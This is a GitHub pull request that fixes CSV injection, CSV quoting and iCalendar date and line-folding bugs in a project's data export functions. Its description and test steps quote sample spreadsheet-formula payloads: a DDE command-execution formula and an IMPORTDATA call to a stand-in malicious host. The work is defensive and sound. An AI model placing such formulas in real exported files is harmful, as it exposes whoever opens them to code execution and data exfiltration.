Fix: CSV Injection and Calendar Formatting Bugs#1003
Open
BinaryBandit-07 wants to merge 1 commit into
Open
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Title: Fix: Resolve CSV Injection vulnerability, CSV formatting corruption, and invalid ICS generation
Description:
This PR/Issue addresses a critical security vulnerability (CSV Injection) and several severe formatting bugs in the data export utilities (downloadData and downloadCalendar). These bugs currently allow malicious code execution via spreadsheet applications and cause exported .csv and .ics files to become corrupted and unusable depending on user input.
The Problem: The downloadData function does not sanitize user inputs (like title or notes) before exporting them to CSV. If a user inputs a string starting with =, +, -, @, \t, or \r (e.g., =cmd|' /C calc'!A0), spreadsheet software (Excel, Google Sheets) will execute it as a formula. This exposes users who download the CSV to arbitrary code execution or data exfiltration.
The Fix: Implemented an escapeCsvValue helper that prepends a single quote (') to any string starting with a dangerous character, forcing spreadsheet clients to evaluate the cell as plain text.
The Problem: The CSV export simply joins fields with a comma (.join(',')). If user-generated fields (like task.title) contain commas, newlines, or quotes, the CSV row breaks entirely, shifting subsequent columns into the wrong places.
The Fix: The new escapeCsvValue helper wraps any string containing commas, newlines, or quotes in double quotes (""), properly escaping them according to standard CSV RFC 4180 specifications.
The Problem: * buildCalendarIcs checks if task.due_at exists, but does not verify if it is a valid date. Parsing an invalid date string results in Invalid Date, which outputs NaNNaNNaNTNaNNaNNaNZ in the .ics file. This causes calendar clients (Google Calendar, Apple Calendar) to silently fail or reject the file.
The current ICS generator does not respect the iCalendar specification (RFC 5545), which strictly limits line lengths to 75 octets. Long task descriptions or titles will currently break strict calendar parsers.
The Fix: * Added a strict !isNaN(new Date(task.due_at).getTime()) check before processing events.
Implemented a foldIcsLine utility that splits strings exceeding 75 characters and inserts the required CRLF + Space for continuation lines.
Steps to Test:
Create a task with the title: =1+1 or =IMPORTDATA("http://malicious-site.com")
Create a task with the title: Read Chapter 1, 2, and 3
Create a task with an invalid date string in the database.
Download the CSV and verify that formulas are not executed (prepended with ') and commas do not create extra columns.
Download the ICS calendar and verify that NaN timestamps do not exist, and long description lines are properly folded with a space on the next line.
Checklist:
[x] Fixed CSV Injection vulnerability.
[x] Fixed CSV formatting for commas, quotes, and newlines.
[x] Fixed NaN timestamp generation in ICS export.
[x] Added RFC 5545 compliant line-folding for ICS files.